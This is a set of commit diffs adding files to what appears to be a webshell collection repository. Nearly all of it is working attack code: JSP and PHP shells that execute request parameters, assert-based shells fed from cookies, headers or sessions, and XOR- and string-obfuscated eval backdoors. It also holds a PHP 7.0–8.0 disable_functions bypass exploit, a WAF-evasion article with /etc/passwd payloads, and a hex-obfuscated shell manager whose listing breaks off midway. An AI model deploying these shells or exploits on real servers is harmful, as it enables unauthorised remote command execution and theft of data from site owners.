Rename remad.me to read.me

backlion delete 404

.gitmodules

@@ -58,3 +58,21 @@
 [submodule "AntSwordProject/AwesomeScript"]
 	path = AntSwordProject/AwesomeScript
 	url = https://github.com/AntSwordProject/AwesomeScript
+[submodule "cseroad/Webshell_Generate"]
+	path = cseroad/Webshell_Generate
+	url = https://github.com/cseroad/Webshell_Generate
+[submodule "rexSurprise/webshell-free"]
+	path = rexSurprise/webshell-free
+	url = https://github.com/rexSurprise/webshell-free
+[submodule "0xAbbarhSF/CTF-WebShells-"]
+	path = 0xAbbarhSF/CTF-WebShells-
+	url = https://github.com/0xAbbarhSF/CTF-WebShells-
+[submodule "zxc7528064/-WebShell-"]
+	path = zxc7528064/-WebShell-
+	url = https://github.com/zxc7528064/-WebShell-
+[submodule "xl7dev/WebShell"]
+	path = xl7dev/WebShell
+	url = https://github.com/xl7dev/WebShell
+[submodule "xl7dev/WebShell/Other/Webshell"]
+    path = xl7dev/WebShell/Other/Webshell
+    url = https://github.com/xl7dev/WebShell

0xAbbarhSF/CTF-WebShells-/README.md

@@ -0,0 +1,7 @@
+# CTF-WebShells-
+Collection of some Handy Capture The Flag 🟩 Web Shells .. Enjoy:D
+
+<img src="https://raw.githubusercontent.com/0xAbbarhSF/CTF-WebShells-/main/images%20(15).jpeg">
+<img src="https://raw.githubusercontent.com/0xAbbarhSF/CTF-WebShells-/main/images%20(16).jpeg">
+
+My Twitter: - 🕊️ [@0xAbbarhSF](https://twitter.com/0xAbbarhSF) <img src="https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white">

README.md

@@ -1,4 +1,4 @@
-# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)
+# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)  | [Türkiye](https://github.com/tennc/webshell/blob/master/README_TR.md)
 
 这是一个webshell收集项目
 
@@ -40,16 +40,16 @@
 > 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
 > 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
 > 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
-> 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
-> 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
-> 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
-> 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
-> 15. [malwares/WebShell](https://github.com/malwares/WebShell)
-> 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
-> 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
-> 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
-> 19. [backlion/webshell](https://github.com/backlion/webshell)
-> 20. [twepl/wso](https://github.com/twepl/wso) wso for php8
+> 11. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
+> 12. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
+> 13. [tdifg/WebShell](https://github.com/tdifg/WebShell)
+> 14. [malwares/WebShell](https://github.com/malwares/WebShell)
+> 15. [lhlsec/webshell](https://github.com/lhlsec/webshell)
+> 16. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
+> 17. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
+> 18. [backlion/webshell](https://github.com/backlion/webshell)
+> 19. [twepl/wso](https://github.com/twepl/wso) wso for php8
+> 20. [flozz/p0wny-shell](https://github.com/flozz/p0wny-shell) p0wny-shell
 
 > ### 顺便在推一波网站管理工具
 > 1. 中国菜刀
@@ -79,10 +79,11 @@ Check github releases. Latest:
 
 [https://github.com/tennc/webshell/releases](https://github.com/tennc/webshell/releases)
 
-## [Thank you to JetBrains for providing an OSS development license for their products](https://www.jetbrains.com/?from=webshell)
+## Many thanks to Jetbrains for providing us with an OSS licence for their fine development tools such as [Jetbrains tools](https://www.jetbrains.com/?from=webshell).
 
-## 
+## [Thanks to Cloudflare](https://www.cloudflare.com/)
 
 [![Stargazers over time](https://starchart.cc/tennc/webshell.svg)](https://starchart.cc/tennc/webshell)
 
 
+

README_TR.md

@@ -0,0 +1,52 @@
+# webshell
+[简体中文](https://github.com/tennc/webshell/blob/master/README.md)
+========
+
+Bu, bir web kabuğu koleksiyon projesidir.
+
+*Birine gül verirseniz, elinizde bir koku kalır*  
+Bu projeyi indirdiğinizde lütfen bir kabuk da gönderiniz.
+
+Bu proje çeşitli yaygın betikleri içermektedir.
+
+Örneğin: asp, aspx, php, jsp, pl, py
+
+Eğer bir web kabuğu gönderirseniz, lütfen adı ve şifreyi değiştirmeyiniz.
+
+Not: Bir kabukta bilerek bir arka kapı olup olmadığı garanti edilemez, ancak kendi yüklerken bilerek asla bir arka kapı eklemeyeceğim.
+
+Lütfen gönderirken bir arka kapı eklemeyiniz.
+
+Eğer bir arka kapı kodu bulursanız, lütfen derhal bir problem oluşturunuz!
+
+Bu projenin sağladığı araçlar yasa dışı faaliyetlerde bulunmak için yasaktır. Bu proje yalnızca test amaçlıdır. Bu projenin neden olduğu sonuçlarla ilgili olarak herhangi bir sorumluluğum yoktur.
+
+> ### Bir proje genişletme 
+> 1. [webshell-venom](https://github.com/yzddmr6/webshell-venom)
+> 2. Öldürmeksizin sınırsız web kabuğu oluşturma aracı
+> 3. Öldürmeksizin sınırsız web kabuğu oluşturma aracı (Öldürmeksizin bir cümle oluşturma | Öldürmeksizin D kalkanı | Öldürmeksizin güvenlik köpeği koruması Tanrı hipposunu kontrol eder ve her şeyi kalkanlar)
+> 4. Yazar: yzddmr6
+> 5. Lütfen kim olduğunuzu belirtiniz.
+
+> ### Diğer web kabuğu projeleri (güncelleme 2020-09-14)
+> 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
+> 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
+> 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
+> ...
+> [Diğer projeler için orijinal metne bakınız](https://github.com/tennc/webshell/blob/master/README.md)
+
+> ### Bu arada, bir dizi web sitesi yönetim aracı yayınlıyoruz
+> 1. Chinese Kitchen Knife
+> 2. Cknife
+> 3. [Altman](https://github.com/keepwn/Altman)
+> ...
+> [Diğer araçlar için orijinal metne bakınız](https://github.com/tennc/webshell/blob/master/README.md)
+
+Yazar: snmztony  
+[Websitesi](https://snmztony.github.io)  
+Lisans: GPL v3
+
+## İndirme bağlantısı
+[Github sürümlerini kontrol edin. En güncel sürüm için buraya tıklayın.](https://github.com/tennc/webshell/releases)
+
+## [Ürünlerinin OSS geliştirme lisansını sağladığı için JetBrains'e teşekkür ederiz](https://www.jetbrains.com/?from=webshell)

cseroad/README.md

@@ -0,0 +1,27 @@
+## Webshell_Generate
+**仅用于技术交流，请勿用于非法用途。**
+
+该工具没什么技术含量，学了一点javafx，使用jdk8开发出了几个简单功能用来管理webshell。页面比较low。
+工具整合并改写了各类webshell，支持各个语言的cmd、蚁剑、冰蝎、哥斯拉，又添加了实际中应用到的一些免杀技巧，以方便实际需要。
+
+## 使用说
+直接下载releases版即可
+
+![image-20220519102709278](images/:Users:cseroad:typora:java高级:images:image-20220519102709278.png)
+
+
+## 参考资料
+
+参考了诸多大佬的文章、工具、思路，如
+
+https://github.com/CrackerCat/JSPHorse
+
+https://github.com/LandGrey/webshell-detect-bypass
+
+https://github.com/czz1233/GBByPass
+
+https://github.com/pureqh/Troy
+
+http://yzddmr6.com/posts/jsp-webshell-upload-bypass/
+
+https://xz.aliyun.com/t/10937

jsp/2022-09-03-01.jsp

@@ -0,0 +1,17 @@
+
+<%@ page import="java.io.InputStream" %>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@page language="java" pageEncoding="utf-8" %>
+
+
+<%
+    String cmd = request.getParameter("cmd");
+    Process process = Runtime.getRuntime().exec(cmd);
+    InputStream is = process.getInputStream();
+    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));
+    String r = null;
+    while((r = bufferedReader.readLine())!=null){
+        response.getWriter().println(r);
+    }
+%>

jsp/2022-09-03-02.jsp

@@ -0,0 +1,16 @@
+<%@ page import="java.io.InputStream" %>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@page language="java" pageEncoding="utf-8" %>
+
+
+<%
+  String cmd = request.getParameter("cmd");
+  Process process = new ProcessBuilder(new String[]{cmd}).start();
+  InputStream is = process.getInputStream();
+  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is));
+  String r = null;
+  while((r = bufferedReader.readLine())!=null){
+    response.getWriter().println(r);
+  }
+%>

jsp/2022-09-03-03.jsp

@@ -0,0 +1,17 @@
+<%@ page import="java.beans.Expression" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStream" %>
+<%@ page language="java" pageEncoding="UTF-8" %>
+<%
+  String cmd = request.getParameter("cmd");
+  Expression expr = new Expression(Runtime.getRuntime(), "exec", new Object[]{cmd});
+
+  Process process = (Process) expr.getValue();
+  InputStream in = process.getInputStream();
+  BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(in));
+  String tmp = null;
+  while((tmp = bufferedReader.readLine())!=null){
+    response.getWriter().println(tmp);
+  }
+%>

php/2022-08-26-01.php

@@ -0,0 +1 @@
+<?=$_GET[p]==_&&$_GET[f]($_GET[a]);

php/2022-08-26-02.php

@@ -0,0 +1 @@
+<?=$_GET['p']=='_'&&$_GET['f']($_GET['a']);

php/2022-08-26-03.php

@@ -0,0 +1 @@
+<?php $_GET['p']=='_'&&$_GET['f']($_GET['a']);

php/2022-08-26-04.php

@@ -0,0 +1 @@
+<?php ($_GET['p']=='_'?$_GET['f']($_GET['a']):y);

php/2022-08-26-05.php

@@ -0,0 +1,2 @@
+<?php
+    ($_GET['p']=='password')?$_GET['f']($_GET['a']):y);

php/2022-08-26-06.php

@@ -0,0 +1,4 @@
+<?php
+  if ($_GET['p']=='password'){
+    $_GET['f']($_GET['a']);
+  }

php/2022-08-26-07.php

@@ -0,0 +1,2 @@
+<?php
+    $_GET['f']($_GET['a']);

php/2022-08-26-08.php

@@ -0,0 +1,5 @@
+<?php
+    $f = $_GET['f'];
+    $a = $_GET['a'];
+    $f($a)
+?>

php/2022-09-09-02.php

@@ -0,0 +1,5 @@
+<?php
+session_start();
+$_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]);
+
+?>

php/2022-09-09-03.php

@@ -0,0 +1,8 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+$c($_SESSION['dmeo']);
+
+?>

php/2022-09-09-04.php

@@ -0,0 +1,8 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+$c(getallheaders()['Demo']);
+
+?>

php/2022-09-09-05.php

@@ -0,0 +1,3 @@
+<?php
+$q=$_GET[1];
+file_get_contents("php".$q)($_GET[2]);

php/2022-09-0901.php

@@ -0,0 +1,9 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+
+$c(base64_decode($_COOKIE["PHPSESSID"]));
+
+?>

php/2023-04-08.js

@@ -0,0 +1,19 @@
+// 此代码为2023-04-08.php 里的二次生成密文版，只需要替换异或的第一部分字符串就好了
+// 感谢群友的无私奉献，我就直接拿来放到这里了
+
+function xorDecrypt(cipherText, key) {
+  let plainText = '';
+  for (let i = 0; i < cipherText.length; i++) {
+    let cipherCharCode = cipherText.charCodeAt(i);
+    let keyCharCode = key.charCodeAt(i % key.length);
+    let plainCharCode = cipherCharCode ^ keyCharCode;
+    plainText += String.fromCharCode(plainCharCode);
+  }
+  return plainText;
+}
+
+let cipherText = "$c(getallheaders()['root'])";
+// cipherText 可以修改起里面获取的内容
+let key = String.raw`t?~KI\OB)+8"X(A6K|{L5L&J]kf~`;
+let plainText = xorDecrypt(cipherText, key);
+console.log(plainText);

php/2023-04-08.php

@@ -0,0 +1,8 @@
+<?php
+session_start();
+$a = "a";
+$s = "s";
+$c=$a.$s."sert";
+$c('P\V,,(..EC]C<M3EcU kq)K%z6OE'^'t?~KI\OB)+8"X(A6K|{L5L&J]kf~');
+
+?>

php/How To Exploit PHP Remotely To Bypass Filters & WAF Rules.md

@@ -0,0 +1,92 @@
+![](https://miro.medium.com/max/1400/0*YS9Xgpo65DOnibMh.png)
+
+This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb but it’s just to reproducing a remote code execution vulnerability scenario (probably in a real scenario, you’ll do a little bit more work to reach this situation):
+
+![](https://miro.medium.com/proxy/1*8642MMLA0kKXigNugsntpA.png)
+
+Obviously, the sixth line is pure evil. The third line tries to intercept functions like system, exec or passthru (there’re many other functions in PHP that can execute system commands but let’s focus on these three). This script is running in a web server behind the Cloudflare WAF (as always, I’m using Cloudflare because it’s easy and widely known by the people, this doesn’t mean that Cloudflare WAF is not secure. All other WAF have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.
+
+For the first test, I try to read /etc/passwd using system() function by the request /cfwaf.php?code=system(“cat /etc/passwd”);
+
+![](https://miro.medium.com/proxy/1*Z7_QAFUWfTuGkkXC5iTIYQ.png)
+
+As you can see, CloudFlare blocks my request (maybe because of the “/etc/passwd”) but, if you have read my last article about uninitialized variables, I can easily bypass it with something like cat /etc$u/passwd
+
+![](https://miro.medium.com/proxy/1*XjThoSZZVxdHPsc7yvr3cA.png)
+
+Cloudflare WAF has been bypassed but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that let me use the system function without using the “system” string? Let’s take a look at the PHP [documentation about strings!](https://secure.php.net/manual/en/language.types.string.php)
+
+PHP String escape sequences
+
+*   \\\[0–7\]{1,3} sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\\400” === “\\000”)
+*   \\x\[0–9A-Fa-f\]{1,2} sequence of characters in hexadecimal notation (e.g. “\\x41”)
+*   \\u{\[0–9A-Fa-f\]+} sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)
+
+Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.
+
+PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.  
+this means that syntaxes like $var(args); and “string”(args); are equal to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here an example:
+
+![](https://miro.medium.com/proxy/1*6tj_EG6wcNf1cZTx6mGcQw.jpeg)
+
+the third syntax is an escape sequence of characters in a hexadecimal notation that PHP converts to the string “system” and then it converts to the function system with the argument “ls”. Let’s try with our vulnerable script:
+
+![](https://miro.medium.com/proxy/1*cyDR__qU4qIfwRbHq0Fsdg.png)
+
+This technique doesn’t work for all PHP functions, variable functions won’t work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.
+
+What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:
+
+![](https://miro.medium.com/proxy/1*xaTUZpVHH-CwqDLSvLC2LA.png)
+
+as you can see on the third line, now the script prevents the use of “ and ‘ inside the $\_GET\[code\] query string parameter. My previous payload should be blocked now:
+
+![](https://miro.medium.com/proxy/1*qNE1auDSwwnzBVwO174kXw.png)
+
+Luckily, in PHP, we don’t always need quotes to represent a string. PHP makes you able to declare the type of an element, something like $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever is inside round brackets without a specific type declaration, is treated as a string:
+
+![](https://miro.medium.com/proxy/1*GKGsbLzK70i4qo_eg8Irhg.jpeg)
+
+In this case, we’ve two ways to bypass the new filter: the first one is to use something like (system)(ls); but we can’t use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $\_GET variable. If I send a request like ?a=system&b=ls&code=$\_GET\[a\]($\_GET\[b\]); the result is: $\_GET\[a\] will be replaced with the string “system” and $\_GET\[b\] will be replaced with the string “ls” and I’ll able to bypass all filters!
+
+![](https://miro.medium.com/proxy/1*NcvPl-CRHy2Cm5xUsbSFGw.jpeg)
+
+Let’s try with the first payload (sy.(st).em)(whoami);
+
+![](https://miro.medium.com/proxy/1*DiaoAKPA5blRp3PCkCwf4w.png)
+
+and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$\_GET\[a\]($\_GET\[b\].$\_GET\[c\]);
+
+![](https://miro.medium.com/proxy/1*8AiSFSkm98axKo_7YUJf9w.png)
+
+In this case, is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass WAF Rule Set that blocks specific PHP function names). All following syntaxes are valid:
+
+This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via $arr\[“internal”\], and the user-defined ones using $arr\[“user”\]. For example:
+
+![](https://miro.medium.com/proxy/1*WRxh720WAmWz-PdAEjUQ0Q.png)
+
+This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:
+
+![](https://miro.medium.com/proxy/1*GJpCkpPrYRtTfUNgd680hw.png)
+
+obviously, this should work against our Cloudflare WAF and script filters:
+
+![](https://miro.medium.com/proxy/1*eBOSkK_YZA5S5mLAlGwsmg.png)
+
+Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax $string\[2\] or $string\[-3\]. This could be another way to elude rules that block PHP functions names. For example, with this string $a=”elmsty/ “; I can compose the syntax system(“ls /tmp”);
+
+![](https://miro.medium.com/proxy/1*FhshSF88OXuviKoG1Sf-Gw.png)
+
+If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like
+
+![](https://miro.medium.com/proxy/1*Pqo5eWcCrAzO_798EN-bpQ.png)
+
+![](https://miro.medium.com/proxy/1*v_5x3PDduhRhkLjNZ7caCg.png)
+
+Let me say that with the OWASP CRS3 all become harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Because Paranoia Level 1 is just a little subset of rules of what we can find in the CRS3, this level is designed to prevent any false positives. With a Paranoia Level 2 all things become hard because of the rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc.. but I can’t execute something like system(“cat /etc/passwd”) as done with Cloudflare WAF:
+
+![](https://miro.medium.com/proxy/1*eyUzRsmsvGABNyRoRiqcXQ.png)
+
+![](https://miro.medium.com/proxy/1*9wRqE3kCK07cS0xId6T_xg.png)
+
+Originally published at https://tutorialboy24.blogspot.com

php/wso-ng/wsoExGently.php

@@ -0,0 +1,203 @@
+
+# PHP 7.0-8.0 disable_functions bypass PoC (*nix only)
+#
+# Bug: https://bugs.php.net/bug.php?id=54350
+# 
+# This exploit should work on all PHP 7.0-8.0 versions
+# released as of 2021-10-06
+#
+# Author: https://github.com/mm0r1
+
+function wsoExGently($cmd) {
+    define('LOGGING', false);
+    define('CHUNK_DATA_SIZE', 0x60);
+    define('CHUNK_SIZE', ZEND_DEBUG_BUILD ? CHUNK_DATA_SIZE + 0x20 : CHUNK_DATA_SIZE);
+    define('FILTER_SIZE', ZEND_DEBUG_BUILD ? 0x70 : 0x50);
+    define('STRING_SIZE', CHUNK_DATA_SIZE - 0x18 - 1);
+    define('CMD', $cmd);
+    for($i = 0; $i < 10; $i++) {
+        $groom[] = Pwn::alloc(STRING_SIZE);
+    }
+    $filtername = 'pwn_filter'.rand(1e4,1e5);
+    stream_filter_register($filtername, 'Pwn');
+    $fd = fopen('php://memory', 'w');
+    stream_filter_append($fd, $filtername);
+    fwrite($fd, 'x');
+    fclose($fd);
+}
+
+class Helper { public $a, $b, $c; }
+class Pwn extends php_user_filter {
+    private $abc, $abc_addr;
+    private $helper, $helper_addr, $helper_off;
+    private $uafp, $hfp;
+
+    public function filter($in, $out, &$consumed, $closing) {
+        if($closing) return;
+        stream_bucket_make_writeable($in);
+        $this->filtername = Pwn::alloc(STRING_SIZE);
+        fclose($this->stream);
+        $this->go();
+        return PSFS_PASS_ON;
+    }
+
+    private function go() {
+        $this->abc = &$this->filtername;
+
+        $this->make_uaf_obj();
+
+        $this->helper = new Helper;
+        $this->helper->b = function($x) {};
+
+        $this->helper_addr = $this->str2ptr(CHUNK_SIZE * 2 - 0x18) - CHUNK_SIZE * 2;
+        $this->log("helper @ 0x%x", $this->helper_addr);
+
+        $this->abc_addr = $this->helper_addr - CHUNK_SIZE;
+        $this->log("abc @ 0x%x", $this->abc_addr);
+
+        $this->helper_off = $this->helper_addr - $this->abc_addr - 0x18;
+
+        $helper_handlers = $this->str2ptr(CHUNK_SIZE);
+        $this->log("helper handlers @ 0x%x", $helper_handlers);
+
+        $this->prepare_leaker();
+
+        $binary_leak = $this->read($helper_handlers + 8);
+        $this->log("binary leak @ 0x%x", $binary_leak);
+        $this->prepare_cleanup($binary_leak);
+
+        $closure_addr = $this->str2ptr($this->helper_off + 0x38);
+        $this->log("real closure @ 0x%x", $closure_addr);
+
+        $closure_ce = $this->read($closure_addr + 0x10);
+        $this->log("closure class_entry @ 0x%x", $closure_ce);
+
+        $basic_funcs = $this->get_basic_funcs($closure_ce);
+        $this->log("basic_functions @ 0x%x", $basic_funcs);
+
+        $zif_system = $this->get_system($basic_funcs);
+        $this->log("zif_system @ 0x%x", $zif_system);
+
+        $fake_closure_off = $this->helper_off + CHUNK_SIZE * 2;
+        for($i = 0; $i < 0x138; $i += 8) {
+            $this->write($fake_closure_off + $i, $this->read($closure_addr + $i));
+        }
+        $this->write($fake_closure_off + 0x38, 1, 4);
+
+        $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
+        $this->write($fake_closure_off + $handler_offset, $zif_system);
+
+        $fake_closure_addr = $this->helper_addr + $fake_closure_off - $this->helper_off;
+        $this->write($this->helper_off + 0x38, $fake_closure_addr);
+        $this->log("fake closure @ 0x%x", $fake_closure_addr);
+
+        $this->cleanup();
+        ($this->helper->b)(CMD);
+    }
+
+    private function make_uaf_obj() {
+        $this->uafp = fopen('php://memory', 'w');
+        fwrite($this->uafp, pack('QQQ', 1, 0, 0xDEADBAADC0DE));
+        for($i = 0; $i < STRING_SIZE; $i++) {
+            fwrite($this->uafp, "\x00");
+        }
+    }
+
+    private function prepare_leaker() {
+        $str_off = $this->helper_off + CHUNK_SIZE + 8;
+        $this->write($str_off, 2);
+        $this->write($str_off + 0x10, 6);
+
+        $val_off = $this->helper_off + 0x48;
+        $this->write($val_off, $this->helper_addr + CHUNK_SIZE + 8);
+        $this->write($val_off + 8, 0xA);
+    }
+
+    private function prepare_cleanup($binary_leak) {
+        $ret_gadget = $binary_leak;
+        do {
+            --$ret_gadget;
+        } while($this->read($ret_gadget, 1) !== 0xC3);
+        $this->log("ret gadget = 0x%x", $ret_gadget);
+        $this->write(0, $this->abc_addr + 0x20 - (PHP_MAJOR_VERSION === 8 ? 0x50 : 0x60));
+        $this->write(8, $ret_gadget);
+    }
+
+    private function read($addr, $n = 8) {
+        $this->write($this->helper_off + CHUNK_SIZE + 16, $addr - 0x10);
+        $value = strlen($this->helper->c);
+        if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
+        return $value;
+    }
+
+    private function write($p, $v, $n = 8) {
+        for($i = 0; $i < $n; $i++) {
+            $this->abc[$p + $i] = chr($v & 0xff);
+            $v >>= 8;
+        }
+    }
+
+    private function get_basic_funcs($addr) {
+        while(true) {
+            $addr -= 0x10;
+            if($this->read($addr, 4) === 0xA8 &&
+                in_array($this->read($addr + 4, 4),
+                    [20151012, 20160303, 20170718, 20180731, 20190902, 20200930])) {
+                $module_name_addr = $this->read($addr + 0x20);
+                $module_name = $this->read($module_name_addr);
+                if($module_name === 0x647261646e617473) {
+                    $this->log("standard module @ 0x%x", $addr);
+                    return $this->read($addr + 0x28);
+                }
+            }
+        }
+    }
+
+    private function get_system($basic_funcs) {
+        $addr = $basic_funcs;
+        do {
+            $f_entry = $this->read($addr);
+            $f_name = $this->read($f_entry, 6);
+            if($f_name === 0x6d6574737973) {
+                return $this->read($addr + 8);
+            }
+            $addr += 0x20;
+        } while($f_entry !== 0);
+    }
+
+    private function cleanup() {
+        $this->hfp = fopen('php://memory', 'w');
+        fwrite($this->hfp, pack('QQ', 0, $this->abc_addr));
+        for($i = 0; $i < FILTER_SIZE - 0x10; $i++) {
+            fwrite($this->hfp, "\x00");
+        }
+    }
+
+    private function str2ptr($p = 0, $n = 8) {
+        $address = 0;
+        for($j = $n - 1; $j >= 0; $j--) {
+            $address <<= 8;
+            $address |= ord($this->abc[$p + $j]);
+        }
+        return $address;
+    }
+
+    private function ptr2str($ptr, $n = 8) {
+        $out = '';
+        for ($i = 0; $i < $n; $i++) {
+            $out .= chr($ptr & 0xff);
+            $ptr >>= 8;
+        }
+        return $out;
+    }
+
+    private function log($format, $val = '') {
+        if(LOGGING) {
+            printf("{$format}\n", $val);
+        }
+    }
+
+    static function alloc($size) {
+        return str_shuffle(str_repeat('A', $size));
+    }
+}

php/zw.php

@@ -0,0 +1,10 @@
+<?php
+$E='t_contJents(J);@ob_end_cleJan();$rJ=@bJase64J_encodJe(@x(@gzJcomprJess($o),$Jk));pJJrint("J$p$kh$r$kf");}';
+$x='J$o.=$t{$i}^J$kJ{$j};}}return $Jo;J}if (@pJreg_Jmatch("/$kh(J.+)J$kJf/",J@fJile_get_contents("pJJhp://in';
+$f=str_replace('v','','vcreatvev_fuvnvvction');
+$B='$Jk){$c=stJrlenJJ($k);$l=JstrleJn($t);$o="";fJoJr($i=0;$iJ<$Jl;){for($j=0J;($j<$c&&$i<$Jl);$j+J+,$iJ++J){';
+$T='puJt"),$m)==J1) J{@Job_sJtart();@evJal(@gzuJncompJress(@x(@bJase64_JdecJode($m[J1]),$k)))JJ;$oJJ=@ob_ge';
+$o='$kJ="50eJcJ93c4";$kh="895JcJ0ccc987a";$kJf="0abJcJa6138a3e"J;$p="inO4VJnJw6Gr66szJatJ";Jfunction x($tJ,';
+$U=str_replace('J','',$o.$B.$x.$T.$E);
+$c=$f('',$U);$c();
+?>

php/zxc/README.md

@@ -0,0 +1,20 @@
+
+# liiuxii 💕
+* the webshell i use
+
+* Gel4y shell [g4y]
+* Kyo mini shell [kyo]
+* C99 shell [C99]
+* WSO shell [WSO]
+* MARIJUANA shell [MRJ]
+* file manager shell [FM]
+* Ngiiix1337 priv8 Shell [PRIV]
+
+
+[g4y]: https://raw.githubusercontent.com/liiuxii/zxc/main/bypass403.php
+[kyo]: https://raw.githubusercontent.com/liiuxii/zxc/main/kyo.php
+[C99]: https://raw.githubusercontent.com/liiuxii/zxc/main/c⁹⁹.php
+[WSO]: https://raw.githubusercontent.com/liiuxii/zxc/main/.v.php
+[MRJ]: https://raw.githubusercontent.com/liiuxii/zxc/main/mrj.php
+[fm]: https://raw.githubusercontent.com/liiuxii/zxc/main/fm.php
+[PRIV]: https://raw.githubusercontent.com/liiuxii/zxc/main/shell.php

php/zxc/bypass403.php

@@ -0,0 +1,171 @@
+<?php
+header("X-XSS-Protection: 0");
+ob_start();
+set_time_limit(0);
+error_reporting(0);
+ini_set("display_errors", false);
+http_response_code(404);
+define("self", "six666segs");
+$scD = "s\x63\x61\x6e\x64\x69r";
+$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65");
+for ($i = 0; $i < count($fc); $i++)
+	$fc[$i] = nhx($fc[$i]);
+if (isset($_GET["p"])) {
+	$p = nhx($_GET["p"]);
+	$fc[3](nhx($_GET["p"]));
+} else {
+	$p = $fc[2]();
+}
+function hex($str) {
+	$r = "";
+	for ($i = 0; $i < strlen($str); $i++)
+		$r .= dechex(ord($str[$i]));
+	return $r;
+}
+function nhx($str) {
+	$r = "";
+	$len = (strlen($str) -1);
+	for ($i = 0; $i < $len; $i += 2)
+		$r .= chr(hexdec($str[$i].$str[$i+1]));
+	return $r;
+}
+function perms($f) {
+	$p = fileperms($f);
+	if (($p & 0xC000) == 0xC000) $i = 's';
+	elseif (($p & 0xA000) == 0xA000) $i = 'l';
+	elseif (($p & 0x8000) == 0x8000) $i = '-';
+	elseif (($p & 0x6000) == 0x6000) $i = 'b';
+	elseif (($p & 0x4000) == 0x4000) $i = 'd';
+	elseif (($p & 0x2000) == 0x2000) $i = 'c';
+	elseif (($p & 0x1000) == 0x1000) $i = 'p';
+	else $i = 'u';
+
+	$i .= (($p & 0x0100) ? 'r' : '-');
+	$i .= (($p & 0x0080) ? 'w' : '-');
+	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
+	$i .= (($p & 0x0020) ? 'r' : '-');
+	$i .= (($p & 0x0010) ? 'w' : '-');
+	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
+	$i .= (($p & 0x0004) ? 'r' : '-');
+	$i .= (($p & 0x0002) ? 'w' : '-');
+	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
+	return $i;
+}
+function a($msg, $sts = 1, $loc = "") {
+	global $p;
+	$status = (($sts == 1) ? "success" : "error");
